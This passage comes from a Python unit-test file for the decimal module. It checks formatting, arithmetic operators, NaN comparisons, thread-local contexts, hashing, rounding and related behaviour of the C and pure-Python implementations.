self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator and decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale with wide char separator and decimal point
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
if decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator '
'({!a} not {!a})'.format(decimal_point, '\u066b'))
if thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator '
'({!a} not {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
def test_decimal_from_float_argument_type(self):
class A(self.decimal.Decimal):
def __init__(self, a):
self.a_type = type(a)
a = A.from_float(42.5)
self.assertEqual(self.decimal.Decimal, a.a_type)
a = A.from_float(42)
self.assertEqual(self.decimal.Decimal, a.a_type)
class CFormatTest(FormatTest):
decimal = C
class PyFormatTest(FormatTest):
decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
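# For instance (illustrative): Decimal('NaN') == Decimal('2') is simply False
# and Decimal('NaN') != Decimal('2') is True without signaling, whereas any
# comparison involving Decimal('sNaN'), and any ordering comparison involving
# a quiet NaN, signals InvalidOperation.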
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.finish1.set()
cls.synchro.wait()
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
cls.assertTrue(c2.flags[DivisionByZero])
with localcontext() as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertTrue(c3.flags[DivisionByZero])
cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
cls.assertTrue(c3.flags[InvalidOperation])
del c3
cls.assertFalse(c2.flags[InvalidOperation])
del c2
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333333333'))
c1 = getcontext()
cls.assertTrue(c1.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
cls.assertTrue(c2.flags[Overflow])
with localcontext(thiscontext) as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertFalse(c3.flags[Overflow])
c3.traps[Underflow] = True
cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
cls.assertTrue(c3.flags[Underflow])
del c3
cls.assertFalse(c2.flags[Underflow])
cls.assertFalse(c2.traps[Underflow])
del c2
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
cls.assertFalse(thiscontext.traps[Underflow])
cls.assertTrue(thiscontext.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(thiscontext.flags[sig])
@threading_helper.requires_working_threading()
class ThreadingTest(unittest.TestCase):
'''Unit tests for thread local contexts in Decimal.'''
# Take care when executing this test from IDLE: there is a threading issue
# that hangs IDLE, and its cause has not been tracked down.
def test_threading(self):
DefaultContext = self.decimal.DefaultContext
if self.decimal == C and not self.decimal.HAVE_THREADS:
self.skipTest("compiled without threading")
# Test the "threading isolation" of a Context. Also test changing
# the DefaultContext, which acts as a template for the thread-local
# contexts.
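# Illustrative expectation (not an extra assertion): a worker thread started
# after DefaultContext.prec is set to 24 below sees prec == 24 in its own
# getcontext(), while flags raised inside one thread must not leak into
# DefaultContext or into the other thread's context.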
save_prec = DefaultContext.prec
save_emax = DefaultContext.Emax
save_emin = DefaultContext.Emin
DefaultContext.prec = 24
DefaultContext.Emax = 425000000
DefaultContext.Emin = -425000000
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
for sig in Signals[self.decimal]:
self.assertFalse(DefaultContext.flags[sig])
th1.join()
th2.join()
DefaultContext.prec = save_prec
DefaultContext.Emax = save_emax
DefaultContext.Emin = save_emin
class CThreadingTest(ThreadingTest):
decimal = C
class PyThreadingTest(ThreadingTest):
decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
self.assertIs(db.__ge__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
D = self.decimal.Decimal
F = fractions[self.decimal].Fraction
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
emax = C.MAX_EMAX if C else 999999999
emin = C.MIN_EMIN if C else -999999999
etiny = C.MIN_ETINY if C else -1999999997
c = Context(Emax=emax, Emin=emin)
with localcontext(c):
c.prec = emax
self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
self.assertLess(F(0,1), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,1))
self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
self.assertEqual(D("0.1"), F(1,10))
self.assertEqual(F(1,10), D("0.1"))
c.prec = 300
self.assertNotEqual(D(1)/3, F(1,3))
self.assertNotEqual(F(1,3), D(1)/3)
self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
self.assertGreater(D('inf'), F(99999999999,123))
self.assertGreater(D('inf'), F(-99999999999,123))
self.assertLess(D('-inf'), F(99999999999,123))
self.assertLess(D('-inf'), F(-99999999999,123))
self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
self.assertNotEqual(D('nan'), F(-9,123))
self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
def hashit(d):
a = hash(d)
b = d.__hash__()
self.assertEqual(a, b)
return a
#just that it's hashable
hashit(Decimal(23))
hashit(Decimal('Infinity'))
hashit(Decimal('-Infinity'))
hashit(Decimal('nan123'))
hashit(Decimal('-NaN'))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 61, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-1"), # ==> -2
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hashit(value), hash(int(value)))
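# Python's unified numeric hash (see sys.hash_info) requires equal
# numeric values to hash equal across int, float, Fraction and Decimal.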
# check that the hashes of a Decimal and a float match when they
# represent exactly the same values
test_strings = ['inf', '-Inf', '0.0', '-.0e1',
'34.0', '2.5', '112390.625', '-0.515625']
for s in test_strings:
f = float(s)
d = Decimal(s)
self.assertEqual(hashit(d), hash(f))
with localcontext() as c:
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
x = Decimal("123456789.1")
c.prec = 6
h1 = hashit(x)
c.prec = 10
h2 = hashit(x)
c.prec = 16
h3 = hashit(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = 10000
x = 1100 ** 1248
self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_hash_method_nan(self):
Decimal = self.decimal.Decimal
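# Signaling NaNs are unhashable; quiet NaNs fall back to the
# identity-based object hash, even when a mix-in class defines __hash__.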
self.assertRaises(TypeError, hash, Decimal('sNaN'))
value = Decimal('NaN')
self.assertEqual(hash(value), object.__hash__(value))
class H:
def __hash__(self):
return 42
class D(Decimal, H):
pass
value = D('NaN')
self.assertEqual(hash(value), object.__hash__(value))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
#Test float and int methods.
Decimal = self.decimal.Decimal
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
#floor
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 3),
('3.899', 3),
('-2.3', -3),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812736),
]
for d, i in test_pairs:
self.assertEqual(math.floor(Decimal(d)), i)
self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))
#ceiling
test_pairs = [
('123.00', 123),
('3.2', 4),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812737),
]
for d, i in test_pairs:
self.assertEqual(math.ceil(Decimal(d)), i)
self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))
#round, single argument
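# Single-argument round() on a Decimal rounds to the nearest integer
# with ties going to the even neighbour (round-half-even), as the
# half-integer cases below show.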
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('-3.5', -4),
('-2.5', -2),
('-1.5', -2),
('-0.5', 0),
('0.5', 0),
('1.5', 2),
('2.5', 2),
('3.5', 4),
]
for d, i in test_pairs:
self.assertEqual(round(Decimal(d)), i)
self.assertRaises(ValueError, round, Decimal('-NaN'))
self.assertRaises(ValueError, round, Decimal('sNaN'))
self.assertRaises(ValueError, round, Decimal('NaN123'))
self.assertRaises(OverflowError, round, Decimal('Inf'))
self.assertRaises(OverflowError, round, Decimal('-Inf'))
#round, two arguments; this is essentially equivalent
#to quantize, which is already extensively tested
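# Note that the non-finite inputs below do not raise: they produce
# quiet NaNs, with the sNaN payload preserved.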
test_triples = [
('123.456', -4, '0E+4'),
('123.456', -3, '0E+3'),
('123.456', -2, '1E+2'),
('123.456', -1, '1.2E+2'),
('123.456', 0, '123'),
('123.456', 1, '123.5'),
('123.456', 2, '123.46'),
('123.456', 3, '123.456'),
('123.456', 4, '123.4560'),
('123.455', 2, '123.46'),
('123.445', 2, '123.44'),
('Inf', 4, 'NaN'),
('-Inf', -23, 'NaN'),
('sNaN314', 3, 'NaN314'),
]
for d, n, r in test_triples:
self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
# The '0' coefficient is implementation specific to decimal.py.
# It has no meaning in the C-version and is ignored there.
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
# For infinities, decimal.py has always silently accepted any
# coefficient tuple.
d = Decimal( (0, (0,), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_as_integer_ratio(self):
Decimal = self.decimal.Decimal
# exceptional cases
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('inf'))
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('-inf'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('-nan'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('snan123'))
for exp in range(-4, 2):
for coeff in range(1000):
for sign in '+', '-':
d = Decimal('%s%dE%d' % (sign, coeff, exp))
pq = d.as_integer_ratio()
p, q = pq
# check return type
self.assertIsInstance(pq, tuple)
self.assertIsInstance(p, int)
self.assertIsInstance(q, int)
# check normalization: q should be positive;
# p should be relatively prime to q.
self.assertGreater(q, 0)
self.assertEqual(math.gcd(p, q), 1)
# check that p/q actually gives the correct value
self.assertEqual(Decimal(p) / Decimal(q), d)
def test_subclassing(self):
# Different behaviours when subclassing Decimal
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
y = None
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertIs(type(d), Decimal)
d = d1.max(d2)
self.assertIs(type(d), Decimal)
d = copy.copy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
d = copy.deepcopy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
# Decimal(Decimal)
d = Decimal('1.0')
x = Decimal(d)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(Decimal)
m = MyDecimal(d)
self.assertIs(type(m), MyDecimal)
self.assertEqual(m, d)
self.assertIs(m.y, None)
# Decimal(MyDecimal)
x = Decimal(m)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(MyDecimal)
m.y = 9
x = MyDecimal(m)
self.assertIs(type(x), MyDecimal)
self.assertEqual(x, d)
self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Subnormal = self.decimal.Subnormal
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Clamped = self.decimal.Clamped
with localcontext(Context()) as c:
c.prec = 7
c.Emax = 999
c.Emin = -999
x = Decimal("111")
y = Decimal("1e9999")
z = Decimal("1e-9999")
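# x is an ordinary operand; y overflows (Emax=999) and z is small
# enough to underflow (Emin=-999), which the calls below use to
# exercise flag and trap behaviour when context=None is passed.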
##### Unary functions
c.clear_flags()
self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(Overflow, y.exp, context=None)
self.assertTrue(c.flags[Overflow])
self.assertIs(z.is_normal(context=None), False)
self.assertIs(z.is_subnormal(context=None), True)
c.clear_flags()
self.assertEqual(str(x.ln(context=None)), '4.709530')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.log10(context=None)), '2.045323')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.logb(context=None)), '2')
self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
self.assertTrue(c.flags[DivisionByZero])
c.clear_flags()
self.assertEqual(str(x.logical_invert(context=None)), '1111000')
self.assertRaises(InvalidOperation, y.logical_invert, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
